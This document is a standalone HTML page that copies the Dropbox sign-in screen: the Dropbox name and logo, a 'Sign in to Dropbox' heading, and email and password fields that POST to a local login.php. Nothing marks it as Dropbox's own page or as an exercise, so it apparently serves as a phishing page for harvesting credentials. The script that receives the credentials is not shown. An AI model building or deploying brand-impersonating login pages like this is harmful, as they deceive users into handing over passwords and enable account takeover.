<!DOCTYPE html>
<html>
<head>
    <title>Dropbox Login</title>
    <!-- Author: Sajjad -->
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f7f9fc;
            margin: 0;
            padding: 0;
        }
        .container {
            background-color: #fff;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 350px;
            margin: 100px auto;
            padding: 20px;
        }
        
        .logo {
       position: absolute;
       top: 0px;
       left: 0px;
        }
        .logo-text {
        position: absolute;
        top: -5px;
        left: 90px;
        font-weight: bold;
       }
       
       .line {
       position: absolute;
       top: 33px; /* Adjust this value to position the line vertically */
       left: 0px; /* Adjust this value to position the line horizontally */
       width: 100%;/* Adjust the width as needed */
       border-top: 1px solid #D3D3D3
       }
        h2 {
            text-align: center;
            color: #0061f2;
        }
        label {
            display: block;
            margin: 10px 0;
            font-weight: bold;
        }
        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        input[type="submit"] {
            background-color: #0061f2;
            color: #fff;
            border: none;
            border-radius: 5px;
            padding: 15px 155px;
            cursor: pointer;
           display: block;
           margin: 0 auto;
           font-weight: bold;
        }
        input[type="submit"]:hover {
            background-color: #004ca0;
        }
    </style>
</head>
<body>
	<div class="logo">
	<img src="logo.png" alt="Dropbox login" width="80"/>
	</div>
	<div class="logo-text">
		<p>Dropbox</p>
	</div>
	<hr class="line">
    <div class="container">
        <h2>Sign in to Dropbox</h2>
        <form action="login.php" method="POST">
            <label for="email">Email</label>
            <input type="text" id="email" name="email" required>
            <label for="password">Password</label>
            <input type="password" id="password" name="password" required>
            <input type="submit" value="Log in">
        </form>
    </div>
</body>
</html>
